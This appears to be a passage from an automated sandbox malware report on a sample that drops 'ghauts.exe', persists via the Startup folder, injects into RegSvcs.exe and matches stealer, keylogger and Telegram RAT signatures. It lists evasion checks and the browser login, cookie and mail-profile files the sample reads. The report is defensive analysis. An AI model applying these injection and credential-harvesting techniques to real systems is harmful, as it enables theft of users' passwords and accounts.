                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598072Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597952Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597815Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597600Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597483Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595936Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594840Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: ghauts.exe, 00000005.00000002.1924740574.0000000001A79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exeL.
                Source: RegSvcs.exe, 00000002.00000002.4170806567.00000000010C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                Source: 3i1gMM8K4z.exe, 00000000.00000003.1698854749.0000000001223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exec9G
                Source: ghauts.exe, 00000001.00000003.1729833484.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                Source: RegSvcs.exe, 00000008.00000002.4170934819.000000000125D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F53F09 BlockInput,0_2_00F53F09
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EE3B3A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F15A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00F15A7C
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE4B37 LoadLibraryA,GetProcAddress,0_2_00EE4B37
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_014411E8 mov eax, dword ptr fs:[00000030h]0_2_014411E8
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_01442868 mov eax, dword ptr fs:[00000030h]0_2_01442868
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_014428C8 mov eax, dword ptr fs:[00000030h]0_2_014428C8
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_01057448 mov eax, dword ptr fs:[00000030h]1_2_01057448
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_01058B28 mov eax, dword ptr fs:[00000030h]1_2_01058B28
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_01058AC8 mov eax, dword ptr fs:[00000030h]1_2_01058AC8
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 5_2_01B88270 mov eax, dword ptr fs:[00000030h]5_2_01B88270
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 5_2_01B86BF0 mov eax, dword ptr fs:[00000030h]5_2_01B86BF0
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 5_2_01B882D0 mov eax, dword ptr fs:[00000030h]5_2_01B882D0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00F380A9
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F0A155
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0A124 SetUnhandledExceptionFilter,0_2_00F0A124
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_005BA155
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BA124 SetUnhandledExceptionFilter,1_2_005BA124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DEA008Jump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D39008Jump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F387B1 LogonUserW,0_2_00F387B1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EE3B3A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EE48D7
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F44C7F mouse_event,0_2_00F44C7F
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe" Jump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F37CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F37CAF
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F3874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F3874B
                Source: 3i1gMM8K4z.exe, ghauts.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 3i1gMM8K4z.exe, ghauts.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0862B cpuid 0_2_00F0862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,2_2_00417A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F14E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F14E87
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F21E06 GetUserNameW,0_2_00F21E06
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F13F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F13F3A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EE49A0
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4175454469.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: ghauts.exeBinary or memory string: WIN_81
                Source: ghauts.exeBinary or memory string: WIN_XP
                Source: ghauts.exeBinary or memory string: WIN_XPe
                Source: ghauts.exeBinary or memory string: WIN_VISTA
                Source: ghauts.exeBinary or memory string: WIN_7
                Source: ghauts.exeBinary or memory string: WIN_8
                Source: ghauts.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
